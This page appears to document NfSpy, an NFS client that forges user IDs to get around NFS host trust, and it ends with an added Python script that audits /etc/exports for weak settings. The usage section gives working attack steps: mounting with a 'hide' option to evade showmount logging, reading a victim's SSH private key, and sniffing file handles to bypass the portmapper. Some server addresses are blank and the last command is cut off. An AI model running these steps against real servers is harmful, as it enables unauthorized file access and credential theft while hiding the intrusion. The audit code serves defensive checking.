NfSpy – ID-spoofing NFS Client

NfSpy is a library/program that uses the Filesystem in Userspace (FUSE) library to automate the falsification of NFS credentials when mounting an NFS share.

Vulnerability exploited
NFS before version 4 relies on host trust relationships for authentication. The NFS server trusts client machines to authenticate users and to assign the same user IDs (UIDs) that the shared filesystem uses. This works in NIS, NIS+, and LDAP domains, for instance, but only if you know that no client machine is compromised or faking its identity, because the only authentication in the NFS protocol is the client-supplied UID and GID (group ID). There are a few things that can be done to enhance the security of NFS, but many of them are incomplete solutions, and even with all three listed here, it could still be possible to circumvent the security measures.

Using NfSpy

A list of options can be seen by running:
nfspy --help


There is an NFS server on

$ showmount -e
Export list for
/home (everyone)

Mount the share. Using sudo lets you bind to a privileged port, and the allow_other option lets any user use the filesystem. The other new option here is "hide", which immediately "unmounts" the share on the server but keeps the filehandle it got. This hides your presence from anyone using showmount -a.

$ sudo nfspy -o server=,hide,allow_other,ro,intr /mnt

Enjoy your newfound freedom!

$ cd /mnt
/mnt$ ls -l
drwx------ 74 8888 200 4096 2011-03-03 09:55 smithj
/mnt$ cd smithj
/mnt/smithj$ cat .ssh/id.rsa
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,30AEB543E512CA19

To unmount, use fusermount:
$ sudo fusermount -u /mnt
Advanced example

There is an NFS server on
Portmap is blocked, so you can't get a list of shares, but you can sniff the network traffic.
$ sudo tshark -n -i eth0 -T fields -e nfs.fhandle
Running as user "root" and group "root". This could be dangerous.
Capturing on eth0

^C3 packets captured

Now use the dirhandle and getroot mount options to avoid using the mount daemon, and the nfsport option to avoid using the portmapper, traversing up the directory tree to the root of the export.

$ sudo nfspy -o rw,server=,nfsport=2049/udp,dirhandle=01:00:04:01:01:00:22:00:e5:03:d8:9d:07:00:22:00:15:83:74:d5:
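As an added example (not part of NfSpy or this page), the following Python audits an /etc/exports file for the settings that make the UID-trust problem described above easiest to abuse: wildcard clients (the "(everyone)" export that showmount reported), no_root_squash, and insecure. The export file, hosts and paths are constructed; the option names are the standard exports(5) ones, and since the page does not list its own three measures, the choice of checks is mine.

```python
import re

# Constructed sample /etc/exports, modelled on the "/home (everyone)" export
# that showmount reported above. Hosts and paths are made up.
SAMPLE_EXPORTS = """\
# home directories, exported to the world
/home *(rw,sync,no_root_squash)
/srv/build 10.0.0.0/24(rw,sync,insecure)
/srv/pub *.example.com(ro,all_squash)
/var/backup 10.0.0.5(rw,sync)
"""

# One client entry: optional host pattern, optional "(options)" group.
CLIENT_RE = re.compile(r'([^\s(]*)(?:\(([^)]*)\))?')


def parse_exports(text):
    """Yield (path, client, options) for every client of every export line.

    A missing client (e.g. "/home (rw)") means "everyone" and is reported
    as "*". Options not given default as in exports(5): ro, root_squash,
    secure (privileged source port required).
    """
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else '')
        if not rest:
            yield path, '*', set()
            continue
        for m in CLIENT_RE.finditer(rest):
            client, opts = m.group(1), m.group(2)
            if not client and opts is None:
                continue  # empty match between tokens
            optset = {o.strip() for o in (opts or '').split(',') if o.strip()}
            yield path, client or '*', optset


def audit_exports(text):
    """Return (path, client, reason) for each weak export entry."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client == '*' or '*' in client or '?' in client:
            mode = 'rw' if 'rw' in opts else 'ro'
            findings.append((path, client, f'wildcard client ({mode}): '
                             'any host may present arbitrary UIDs/GIDs'))
        if 'no_root_squash' in opts:
            findings.append((path, client, 'no_root_squash: '
                             'client UID 0 is root on the server'))
        if 'insecure' in opts:
            findings.append((path, client, 'insecure: unprivileged source '
                             'ports accepted, so any client user can forge UIDs'))
    return findings
```

Entries with a specific host and default options (such as /var/backup above) produce no finding; they still rest on trusting that host to report UIDs honestly.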

